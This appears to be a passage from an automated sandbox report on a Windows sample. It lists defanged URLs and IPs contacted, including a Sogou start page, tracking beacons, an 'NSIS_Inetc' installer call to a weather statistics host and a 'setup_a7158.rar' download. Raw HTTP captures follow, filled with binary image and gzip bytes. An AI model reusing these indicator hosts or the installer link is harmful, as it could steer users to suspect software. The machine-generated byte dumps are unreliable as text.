| hxxp://ctc.ping.sogou.com/pv.gif?uigs_productid=ufo&ufoid=wan&ptype=jztf2&pcode=index&rdk=1399956570103&img=pv.gif&sourcelist=0011000100006_0011000100007_0011000100008_0011000100009_0011000100010_0011000100011&titlelist=风云无åÂÅ’_仙侠é“_暗黑屠龙_Sogou傲剑2_万世_大闹天宫OL | |
| hxxp://ctc.ping.sogou.com/pv.gif?uigs_productid=daohang&rdk=1399956570493&img=pv.gif&pars=?rand=1399956570493&suid=null&sduv=1399956570462_5852_00001&ckid=6846_00001_00000_3030_00000_00000&m=null&apid=null&sgtp=null&refer=&page=&pageUrl=http%3A%2F%2F123.sogou.com%2F%3F22014&loc=null&hp=-1&pid=Af22014&ptype=index&pcode=index&yyid=null&skin=null&ver=v53_ie6_cr__4&sys=100&ser=null&sev=null&time=3531 | |
| hxxp://njsh.cdn.sogou.com/imgn/tips/skin_tips_n1.gif | |
| hxxp://njsh.cdn.sogou.com/imgn/v32/setskinbg.gif | |
| hxxp://proxy.sogou.com/images/weather/cloudy.gif | |
| hxxp://proxy.sogou.com/images/weather/fine_cloudy.gif | |
| hxxp://sj88.www.web.glb0.ldcache.net/hezi/jm/setup_a7158.rar | |
| hxxp://weather51la.cnzz.alivcd.com/cnzz/weather/5.0.0.5002/tongji/tongji_61.html | 122.225.104.211 |
| hxxp://njsh.cdn.sogou.com/imgn/v51/new-erweima2.png | |
| hxxp://njsh.cdn.sogou.com/v53/jsn/main.js?V=16bb90f6b3db269d3b0dadfb85d67a51a | |
| hxxp://ctc.ping.sogou.com/pv.gif?uigs_productid=ufo&ufoid=ads&ptype=ads&pcode=ads&rdk=1399956570087&img=extra.gif&yyid=&ssuv=&m=&loc=&module=show&tag=172 | |
| hxxp://ctc.ping.sogou.com/pv.gif?uigs_productid=ufo&ufoid=daohang&ptype=indexv53&pcode=index&rdk=1399956575900&refer=&page=æœ狗网å€导航ï¼Âï¼Â网å€大全,实çâ€Â¨Ã§Â½â€˜Ã¥Â€,尽在123.sogou.com&pageUrl=http://123.sogou.com/?22014&img=pv.gif&vcode=v53 | |
| hxxp://proxy.sogou.com/v53/get_tj.php?hz=4666521&ids=qiche | |
| hxxp://njsh.cdn.sogou.com/v53/imgn/guide_tip.png | |
| hxxp://njsh.cdn.sogou.com/imgu/2014/05/20140507144124_693.jpg | |
| hxxp://njsh.cdn.sogou.com/imgu/2014/05/20140512170407_319.jpg | |
| hxxp://njsh.cdn.sogou.com/imgu/2014/05/20140513112717_7.jpg | |
| hxxp://njsh.cdn.sogou.com/imgu/2014/05/20140512112800_851.jpg | |
| hxxp://njsh.cdn.sogou.com/imgn/sehome/tjv1/new-ico.png | |
| hxxp://njsh.cdn.sogou.com/imgn/sehome/tjv1/img-news.gif | |
| hxxp://njsh.cdn.sogou.com/imgu/2014/05/20140512170546_833.jpg | |
| hxxp://njsh.cdn.sogou.com/imgu/2014/05/20140507144656_823.jpg | |
| hxxp://njsh.cdn.sogou.com/imgn/sehome/tjv1/img-video-2.gif | |
| hxxp://njsh.cdn.sogou.com/imgn/v51/i-ico-2b.png | |
| hxxp://save2.xdwscache.glb0.lxdns.com/img/news_photo/2014/05/12/fIXLig2wT89333.jpg | |
| hxxp://njsh.cdn.sogou.com/imgn/v32/logo_1112293.gif | |
| hxxp://save2.xdwscache.glb0.lxdns.com/img/news_photo/2014/05/12/1oq9Gg9Y3L8813.jpg | |
| hxxp://weather51la.cnzz.alivcd.com/post/ | 122.225.104.211 |
| hxxp://proxy.sogou.com/favicon.ico | |
| hxxp://weather51la.cnzz.alivcd.com/cnzz/weather/weatherPng/cnzz.html | 122.225.104.211 |
| hxxp://weather51la.cnzz.alivcd.com/cnzz/weather/5.0.0.5002/weatherdata/_61/cnzz.html | 122.225.104.211 |
| hxxp://weather51la.cnzz.alivcd.com/cnzz/weather/5.0.0.5002/weatherdata/_61/WeatherContext.xml | 122.225.104.211 |
| hxxp://int.dpool.sina.com.cn/iplookup | 123.125.29.252 |
| hxxp://int.dpool.sina.com.cn/iplookup/ | 123.125.29.252 |
| hxxp://p3.123.sogoucdn.com/imgn/sehome/tjv1/new-ico.png | 58.215.147.36 |
| hxxp://p0.123.sogoucdn.com/imgu/2014/05/20140512112800_851.jpg | 222.211.87.167 |
| hxxp://d.123.sogoucdn.com/v53/imgn/v53_bicos.gif | 114.80.179.224 |
| hxxp://p9.123.sogoucdn.com/imgu/2014/05/20140507144656_823.jpg | 114.80.179.222 |
| hxxp://pic1.xcarimg.com/img/news_photo/2014/05/12/1oq9Gg9Y3L8813.jpg | 222.84.167.30 |
| hxxp://d.123.sogoucdn.com/ads_hz/_ads_2.js?t=777753 | 114.80.179.224 |
| hxxp://p3.123.sogoucdn.com/imgn/sehome/tjv1/img-news.gif | 58.215.147.36 |
| hxxp://p7.123.sogoucdn.com/imgu/2014/05/20140513112717_7.jpg | 58.215.147.42 |
| hxxp://weather51la.cnzz.uujzy.com/cnzz/weather/5.0.0.5002/weatherdata/_61/cnzz.html | 122.225.104.211 |
| hxxp://p6.123.sogoucdn.com/imgu/2013/08/20130820165531_481.gif | 58.215.147.38 |
| hxxp://p0.123.sogoucdn.com/imgn/v32/skin3.gif | 222.211.87.167 |
| hxxp://d.123.sogoucdn.com/v53/imgn/v53_2icos.gif | 114.80.179.224 |
| hxxp://p3.123.sogoucdn.com/imgn/sehome/tjv1/img-video-2.gif | 58.215.147.36 |
| hxxp://123.sogou.com/favicon.ico | 106.120.151.64 |
| hxxp://www.sj88.com/hezi/jm/setup_a7158.rar | 202.97.174.78 |
| hxxp://p0.123.sogoucdn.com/imgn/v32/titlebg.png | 222.211.87.167 |
| hxxp://p6.123.sogoucdn.com/imgn/123ie/setting_icon.gif | 58.215.147.38 |
| hxxp://d.123.sogoucdn.com/v53/imgn/guide_tip.png | 114.80.179.224 |
| hxxp://p1.123.sogoucdn.com/imgn/v32/skin2_0.gif | 222.211.87.171 |
| hxxp://123.sogou.com/images/weather/cloudy.gif | 106.120.151.64 |
| hxxp://123.sogou.com//v53/get_123_v53.php?block=wt&ver=v53&gfg=1&city=unknown&pid=Af22014&c=1399956570478&method=ajaf&cbf=fn | 106.120.151.64 |
| hxxp://123.sogou.com/v53/jsn/v53_123n.js?V=cr | 106.120.151.64 |
| hxxp://img.users.51.la/15909623.asp | 117.21.191.223 |
| hxxp://p4.123.sogoucdn.com/imgn/v32/fbg_about.png | 114.80.179.226 |
| hxxp://pb.sogou.com/pv.gif?uigs_productid=ufo&ufoid=ads&ptype=ads&pcode=ads&rdk=1399956570087&img=extra.gif&yyid=&ssuv=&m=&loc=&module=show&tag=172 | 106.120.151.49 |
| hxxp://123.sogou.com/?22014 | 106.120.151.64 |
| hxxp://d.123.sogoucdn.com/v53/imgn/v53_arrow_h.gif | 114.80.179.224 |
| hxxp://d.123.sogoucdn.com/imgn/v32/icon4.gif | 114.80.179.224 |
| hxxp://123.sogou.com/jsn/hotdata.js?V=1399956570493 | 106.120.151.64 |
| hxxp://p0.123.sogoucdn.com/u/js/ufo2.js | 222.211.87.167 |
| hxxp://p3.123.sogoucdn.com/imgn/v51/i-ico-2b.png | 58.215.147.36 |
| hxxp://p5.123.sogoucdn.com/imgn/v32/logo_1112293.gif | 222.211.87.185 |
| hxxp://pb.sogou.com/pv.gif?uigs_productid=ufo&ufoid=ads&ptype=ads&pcode=ads&rdk=1399956570071&img=extra.gif&yyid=&ssuv=&m=&loc=&module=show&tag=62 | 106.120.151.49 |
| hxxp://d.123.sogou.com/jsn/v33_sugg_ajaj_v40_3.js | 114.80.179.210 |
| hxxp://p8.123.sogoucdn.com/imgn/tips/skin_tips_n1.gif | 222.211.87.163 |
| hxxp://p2.123.sogoucdn.com/imgu/2014/05/20140507144124_693.jpg | 58.215.147.40 |
| hxxp://123.sogou.com/images/weather/fine_cloudy.gif | 106.120.151.64 |
| hxxp://123.sogou.com/v53/get_tj.php?hz=4666521&ids=qiche | 106.120.151.64 |
| hxxp://weather51la.cnzz.uujzy.com/cnzz/weather/weatherPng/cnzz.html | 122.225.104.211 |
| hxxp://123.sogou.com/css/skin_.css?V=cr | 106.120.151.64 |
| hxxp://p3.123.sogoucdn.com/imgn/v32/setskinbg.gif | 58.215.147.36 |
| hxxp://wan.sogou.com/dh/dhrc/rec.do?block=gamev2&jsonp=__yx2q&t=1&_stamp=1399956568915 | 106.120.151.65 |
| hxxp://p9.123.sogoucdn.com/imgu/2014/05/20140512170546_833.jpg | 114.80.179.222 |
| hxxp://pb.sogou.com/pv.gif?uigs_productid=ufo&ufoid=daohang&ptype=indexv53&pcode=index&rdk=1399956575900&refer=&page=æœ狗网å€导航ï¼Âï¼Â网å€大全,实çâ€Â¨Ã§Â½â€˜Ã¥Â€,尽在123.sogou.com&pageUrl=http://123.sogou.com/?22014&img=pv.gif&vcode=v53 | 106.120.151.49 |
| hxxp://p0.123.sogoucdn.com/imgn/sehome/tjv1/subnav_v41.png | 222.211.87.167 |
| hxxp://p4.123.sogoucdn.com/imgn/v32/selogo_111207.png | 114.80.179.226 |
| hxxp://weather51la.cnzz.uujzy.com/cnzz/weather/5.0.0.5002/weatherdata/_61/WeatherContext.xml | 122.225.104.211 |
| hxxp://p8.123.sogoucdn.com/imgn/v32/selogo_111207.png | 222.211.87.163 |
| hxxp://pic4.xcarimg.com/img/news_photo/2014/05/12/fIXLig2wT89333.jpg | 222.84.167.30 |
| hxxp://p0.123.sogou.com/imgn/tips/lk_jumei.png | 1.100.192.15 |
| hxxp://p4.123.sogoucdn.com/imgu/2014/05/20140508103513_537.gif | 114.80.179.226 |
| hxxp://d.123.sogou.com/jsn/citydata.js | 114.80.179.210 |
| hxxp://p7.123.sogoucdn.com/imgn/123ie/search_arrow.gif | 58.215.147.42 |
| hxxp://p3.123.sogoucdn.com/imgn/v51/new-erweima2.png | 58.215.147.36 |
| hxxp://d.123.sogoucdn.com/v53/imgn/foot_slider.jpg | 114.80.179.224 |
| hxxp://p8.123.sogoucdn.com/imgu/2014/05/20140512170407_319.jpg | 222.211.87.163 |
| hxxp://p1.123.sogoucdn.com/imgn/v32/selogo_111207.png | 222.211.87.171 |
| hxxp://d.123.sogoucdn.com/v53/jsn/main.js?V=16bb90f6b3db269d3b0dadfb85d67a51a | 114.80.179.224 |
| hxxp://www.xzsky.com/post/ | 122.225.104.211 |
| hxxp://pb.sogou.com/pv.gif?uigs_productid=ufo&ufoid=wan&ptype=jztf2&pcode=index&rdk=1399956570103&img=pv.gif&sourcelist=0011000100006_0011000100007_0011000100008_0011000100009_0011000100010_0011000100011&titlelist=风云无åÂÅ’_仙侠é“_暗黑屠龙_Sogou傲剑2_万世_大闹天宫OL | 106.120.151.49 |
| hxxp://pb.sogou.com/pv.gif?uigs_productid=daohang&rdk=1399956570493&img=pv.gif&pars=?rand=1399956570493&suid=null&sduv=1399956570462_5852_00001&ckid=6846_00001_00000_3030_00000_00000&m=null&apid=null&sgtp=null&refer=&page=&pageUrl=http%3A%2F%2F123.sogou.com%2F%3F22014&loc=null&hp=-1&pid=Af22014&ptype=index&pcode=index&yyid=null&skin=null&ver=v53_ie6_cr__4&sys=100&ser=null&sev=null&time=3531 | 106.120.151.49 |
| hxxp://p2.123.sogoucdn.com/imgu/2013/05/20130531144119_126.png | 58.215.147.40 |
| hxxp://d.123.sogoucdn.com/kan/static/css/DD_belatedPNG_0.0.8a-min.js?t= | 114.80.179.224 |
| vipimg.51.la | 182.236.163.41 |
| weather.uujzy.com | 122.225.203.94 |
| www.biso.cc | 67.198.240.190 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /dh/dhrc/rec.do?block=gamev2&jsonp=__yx2q&t=1&_stamp=1399956568915 HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: wan.sogou.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:24 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 374
Connection: keep-alive
Set-Cookie: SSUID=E7F48AC1243DE19807397E1A09B09599; expires=Mon, 08-May-34 04:49:24 GMT; path=/
Set-Cookie: IPLOC=UA; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
__yx2q([{"gid":"212","title":"............","source":"0011000100006"},{"gid":"181","title":".........","source":"0011000100007"},{"gid":"177","title":"............","source":"0011000100008"},{"gid":"215","title":"Sogou......2","source":"0011000100009"},{"gid":"178","title":"......","source":"0011000100010"},{"gid":"86","title":"............OL","source":"0011000100011"}]).HTTP/1.1 200 OK..Server: nginx..Date: Tue, 13 May 2014 04:49:24 GMT..Content-Type: text/plain; charset=utf-8..Content-Length: 374..Connection: keep-alive..Set-Cookie: SSUID=E7F48AC1243DE19807397E1A09B09599; expires=Mon, 08-May-34 04:49:24 GMT; path=/..Set-Cookie: IPLOC=UA; path=/..P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"..__yx2q([{"gid":"212","title":"............","source":"0011000100006"},{"gid":"181","title":".........","source":"0011000100007"},{"gid":"177","title":"............","source":"0011000100008"},{"gid":"215","title":"Sogou......2","source":"0011000100009"},{"gid":"178","title":"......","source":"0011000100010"},{"gid":"86","title":"............OL","source":"0011000100011"}])...
GET /imgn/v32/logo_1112293.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p5.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:33 GMT
Content-Type: image/gif
Content-Length: 4512
Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:33 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GIF89a..B...................................J}.v....._.,..;..-a.5m.J..Z..R..x..`....................................`..]..]..[..Y..V..R..N..M~.Iy.Eq.Bm.[..f.._..O..a..V..\..Kw.Is.d..T..Rx'g.V..i..Mz.k..w...........................w..s..q..o..l..l..i..f..b..]..Ly.Hs.~..u..s..d.._..P|.Z..y..u..i..^.....|..r..u..o..k..e..\..a..Ox.h.....X.....{..j.(..#\~4y.K..:w.4j.E..S..W..p..|.....w...................................................z..h..e.....o.....y...........y.&..(..(..!p.&y.5..=..=..<..;..<..D..G..;..C..B..J..A..;..O..N..L..O..S..S..L..Y..Y..R..D..<q.^..a..h..f..e..{..^...........................................................................................................................................................................................................!.......,......B........H......*\......#J.H.....3j...... C..I....(S.\.....".i.G..Mr..M...g.k.....n.......'/.7.P.>.....o..q..u .s....&.......;...8......5..t...t9....e......8.p..mVh@.n..}[7.\....H....@....47o]9r...}..[..6X.^A...n...........|x....../.F.N..rG..[.721.-d...B...1t..1....vOU&p........x...r.... ........Cv,....8....3........:.|....-....I..}%...9.X.C8Yq..8=....).0....p..'.!D8..C.6.%.C..e.!|...Cf.T0.. .$.9.P..1[m......Bl H...g.p..hF...y...;{9t..C...r.%..{L...@Kf.!..T@d...#.9....7.h#.....B.b.p..g`!..i\q..W.Q..o...4.}(...L.0.p..I..u.D...h....JpA.G.z(..Y3O:...@..H..........@...>...c8!n.d....b=.a..2...C...? .......A....lE..c.01(`A..b3-6..CGv .0..%`...N0.....1..w...9......*.Y. `.Y.C.....}..{..g.p.R.....t...}.$A T`.D..S..:(....\c56
<<
<<< skipped >>>
GET /imgn/v32/skin2_0.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p1.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:23 GMT
Content-Type: image/gif
Content-Length: 592
Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GIF89a..........Ly.Ky.Aq.Et.Iw.S..W..Z..[..a..d..c..e..g..w...................................s..............................................................................................................................................................................................................................................................................................................!.....s.,............s.s...s ..................)q(....&X*....#qnmol!!p<Pad%..$igbf`ch\OYIQ"...rlj_^]PMK/U:..s...pe[ZJG7'......kNLH6CF*....W.EB35-..s.............B$...=~.HX...*8...... ..B...`..@.;HTTP/1.1 200 OK..Server: nginx/1.4.1..Date: Tue, 13 May 2014 04:49:23 GMT..Content-Type: image/gif..Content-Length: 592..Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT..Connection: keep-alive..Expires: Thu, 12 Jun 2014 04:49:23 GMT..Cache-Control: max-age=2592000..Accept-Ranges: bytes..GIF89a..........Ly.Ky.Aq.Et.Iw.S..W..Z..[..a..d..c..e..g..w...................................s..............................................................................................................................................................................................................................................................................................................!.....s.,............s.s...s ..................)q(....&X*....#qnmol!!p<Pad%..$igbf`ch\OYIQ"...rlj_^]PMK/U:..s...pe[ZJG7'......kNLH6CF*....W.EB35-..s.............B$...=~.HX...*8...... ..B...`..@.;..
<<
<<< skipped >>>
GET /cnzz/weather/5.0.0.5002/tongji/tongji_61.html HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: weather51la.cnzz.alivcd.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:30 GMT
Content-Type: text/html
Content-Length: 2
Last-Modified: Fri, 21 Mar 2014 05:47:34 GMT
Connection: keep-alive
ETag: "532bd276-2"
Accept-Ranges: bytes
OKHTTP/1.1 200 OK..Server: nginx/1.4.1..Date: Tue, 13 May 2014 04:49:30 GMT..Content-Type: text/html..Content-Length: 2..Last-Modified: Fri, 21 Mar 2014 05:47:34 GMT..Connection: keep-alive..ETag: "532bd276-2"..Accept-Ranges: bytes..OK..
GET /imgn/v32/selogo_111207.png HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p8.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:23 GMT
Content-Type: image/png
Content-Length: 12155
Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.PNG........IHDR...a...?.....V.......pHYs................OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE...........Q,......!.........{.k........>...........H3Q5...B..........@..$p....d!s.#...~<< ".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<. ...*..x..<.$9E.[.-q.WW..(.I. .6a.a.@..y..2.4..............x.....6..._-...."bb.....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<......$.2].G......L......b...G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt.......o..(...h...w..?.G.%..fI.q..^D$.T..?....D..*.A....,.........`6.B$..B.B.d..r`)..B(....*`/.@.4.Qh..p...U..=p..a...(....A...a!...b.X#......!.H...$ ...Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6....h...>C.0....3.l0...B.8,..c.."......V.....c..w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9., .......3...!.[..b@q..S.(R.jJ....4..e.2AU..R...T.5.ZB...R.Q...4u.9...IK......h.h.i..t.....N..W...G.....w.......g(.....g.w...L......T071......oUX*.*|.....J.&..*/T.......U.U.T..^S}.FU3S......U..P.S.Sg.;...g.oT?.~Y...Y.L.OC.Q.._... .c..x,!k...u.5.&...|v*......=...9C3J3W.R..f?...q..tN..(...~....).)..4L.1e\k....X.H.Q.G..6......E.Y...A.J'\'Gg.....S.S.....M=:....k....Dw.n.....^..Lo..y....}/.T.m...G.X...$.....<.5qo<./...QC].@C.a.a......<..F.F..i.\.$.m.m..&.&!&KM.M..RM..).;L;L........5.=1.2.......
<<
<<< skipped >>>
GET /?22014 HTTP/1.1
User-Agent: ...............
Connection: Keep-Alive
Host: 123.sogou.com
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:17 GMT
Content-Type: text/html; charset=gbk
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa HISa TELa OTPa OUR UNRa IND UNI COM NAV INT DEM CNT PRELOC"
Content-Encoding: gzip
90c9................\.u/...gb!..=......`v..X........7.2....12N>6.A ....@ @...$.yy...G.;..b...~.sj.Uw..I..21..[.T..sN..N......{....$..V3...{.~p_b"9=.......O.O|....y8.I..O..v.1ht.Nsz.......`.]..^[[K..R.^m..'......,?&......2.|?...]..|..1h..W>:}..g.N.<..........W~.......y..L.;..O3.\...u..r.u..x...;p0.A7...6V.&..|zOr_..u..R..H.;....,M<x`.@k.t....f'.................`...X.;..;X..V0.........w}......0.)=.)5...?...............s.....N......n....v..............g.....3ZN.....}...M..t......8y..o..z.....x..H?{s.c...r...u....U..............{.....o.A.{.....#....^.y....^?v........}..K.~|...?<.W....[.....7....O....s?....?...g..._...7....4HB..?|.o...............;......n....c..$...J..6.&.X..D..V.&..-......*....&...[.y<.....8}4.....hI...x..;......U.....K.....B.]K...........-|.Z\k. ...j!..^..Z..|....C.j.....?....u3....K..*)M8.J..~z.iO.. ..t......Xr.. .?..b:.N.9.V..:...Z_..`N.....'Um..y_........8ht...}..CZ5R..f).Y5.-..1.!.V...V..V-....~5lo._:.. ...%.@.`........&.K....35lN5.S..T.......zv....N...j...j....T.m...T..e....*..Je.mm..^..^Hw..v.J.....-'...%........-g..ivz...*.-..' n...Bv.....Yn.No.......D...l..I...Y.6;.`..V.[.l.e_&A3..}...{.Z}...zne.I...I..Q.W<..\.....B.....s..-J.. ...[...P......0..Eh.,9..Z.._.&....59.v.Q...,......,....Uwq#..r....V!..........4HL|m...T...V.m.5*..B&.......G{k..*...2%..A.....M.;.F%1Y...bW..)..p`.f.....z......j>.).?i..#..3.t 4h..3.....K... 6y2.E.E.?.......09(.M...@..a..RkT..C.-..V.....;...~7..O ...j.;._i.s)..oW..I..........>...F..t..J.NyE""W0.M8..H?x..&A.O..e.4......1.,.h..a.........M...
<<
<<< skipped >>>
GET /css/skin_.css?V=cr HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 123.sogou.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:22 GMT
Content-Type: text/css
Content-Length: 21
Connection: keep-alive
Last-Modified: Tue, 20 Sep 2011 09:23:40 GMT
ETag: "4e785b9c-15"
Expires: Wed, 14 May 2014 11:53:00 GMT
Cache-Control: max-age=259200
Accept-Ranges: bytes
/* skin default */...HTTP/1.1 200 OK..Server: nginx..Date: Tue, 13 May 2014 04:49:22 GMT..Content-Type: text/css..Content-Length: 21..Connection: keep-alive..Last-Modified: Tue, 20 Sep 2011 09:23:40 GMT..ETag: "4e785b9c-15"..Expires: Wed, 14 May 2014 11:53:00 GMT..Cache-Control: max-age=259200..Accept-Ranges: bytes../* skin default */.......
GET /v53/jsn/v53_123n.js?V=cr HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 123.sogou.com
Connection: Keep-Alive
Cookie: ipt=0
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:23 GMT
Content-Type: application/x-javascript; charset=gbk
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Thu, 08 May 2014 05:03:36 GMT
Expires: Wed, 14 May 2014 11:54:27 GMT
Cache-Control: max-age=259200
Content-Encoding: gzip
5206..............y...u/.U.).U......zC.....y..'R>......U...P...f.. ....(.'..ls...;@...........).I.{.dK.d...nDdFVU....3sHtel7"nD..q....q.....\.W.....vm4wW.9h.{^?...._g...].&..@........$t'C........v.;.*.......(L;.?.p........._..w.?.d..g[.%Hg.G^8...Z.n........_8....z....~...|$............?N..sv.`.......^..xsN.\t.....Y..........."%.....w.....o.=...u`c...0.[=f6....G......~....`T....N...o%.x......`..{.vk.....*...A..E\I.B.}...P#.....`g0j....$`p....C.Dg.>.j[.....dw...v.m...Y51..|.L....y..V...9.B4{..%....b..G......]....6.u..".9..D.{!......`';.z.......@.*z"..6..X.o...C.#........;..xT..3...X..[i'..?v.}w=...w\.f.....r.wG1wG>..eL....qu...H ..j..*.a"....sYo.6k&.F!...i.....o.kh.*.:.Y..."....5s........f.15....."S6../.|...%..L..WJ0..'..V..1...,..>.z1..j. %. f..~........s6znF.zS......X..?........p8t...VD.....n.4.'.F"j.a....c......K.N...'P......H..R...n.tb4.../._..Vr.....m.K..B.Xj,/........\X.7...r.. ...s....&'......l.d...2-..~.o/J{.|.0...c;s\.i(...?\..G..>.u..x.....-R.v...........3.-.2I.f.l.........k........4kP?...e.G..6..j.... .].tUO..h.H.........I..enq.$&.}\ 3....5...Y8.8.?.la..Lv......75I.....0e..t"...Q..@L..i....!a....F..w..]..x.,.^..46w...g.......,A.%..Rqy..[e|LpV.Z..z..7WZ.fc..(7....J...So&...z....2 ..Y.V.5..:s.....l^....#.../.gH.^{;;;.8......X.=1. .3V..{$qg.ZbP..Bv..Z...... .s }.9....~..[..".E%.M.R.A....a.)..{g....B...-.....6OS...v...1T..$...V-..l.T.v...p..z.t.3.c.)...{.YU .1.~.......a........q..8...W...y.W.%..p..h.........C.z..B=....B...:..T..2...).9s..#..$..`...AoP...8..........hT.sN...`N...N....:....=g.$
<<
<<< skipped >>>
GET /jsn/hotdata.js?V=1399956570493 HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 123.sogou.com
Connection: Keep-Alive
Cookie: ipt=0; SDUV=1399956570462_5852_00001; CKOR=6846_00001_00000; CKOD=3030_00000_00000; GOTO=Af22014
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:25 GMT
Content-Type: application/x-javascript; charset=gbk
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Tue, 13 May 2014 03:59:57 GMT
Set-Cookie: IPLOC=UA; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Fri, 16 May 2014 04:49:25 GMT
Cache-Control: max-age=259200
Content-Encoding: gzip
c63.............YkO..../D..."....^..lc.`I ..H...=..........{.z..{.....,..f.^.NUWw..<..'?Z...skz.....[..t.K.2.i.{...i3.lf;.lP...{.H..H...Ok........i..7:..>.'.Q:>k.K....g.Sq"...Mgv..._...Q.~.t~.I.}.o.A...ju>~h|<.......Y.bx.M.Nn.&.....(.?......cO.u..2Qk}.......*...N..9?..A.....?.T.z];8......................(.>z?..._.O....[...r...~.....ZZ.w..x...t...L.N6c...eg.U.f.].Y....5..T^PY..-.....J...c!....X...g.i..r.f...L....(..&.Z.C"..J.*.....b.|>..4..^sx.cC..P...F...61_{-.Z(....},.....:*.uB......dw8i......$-...]z....z...iR...s.....F.UE.(5LT..'...F..F.l.p..3..h/.B#.2.,...T!C..4...v.E.$...f..8Yh....z.UY.Z..m.kk#/#....Q-Y*...*.....Z{.....T..X..7Xy.....2?..4..u..s....|.. r..GU..<.....L.xq..f..C..J .(.p. ..}(.E.y......V..YI.Q.y.. .....^.`j.;....4....'.f...d 8N1..#]F.`6..V....................4...v{.G.9xO...~........f.^...[.......1..McP.il..R;....u.k.tI.i...\W....@...ZL.....\Q.r<. L..p..|%f]....!.n..{w?.i'...F!.....[..........*..V`.U.>..^s0..;.8H[....2."Ve....2..a..W3&n{.4 ..Q.I'.D._ .{...u....a..m.....[!..fGh.....!l.*..\..D.|.X...jJ.:.r).......|.Yw.#I....R 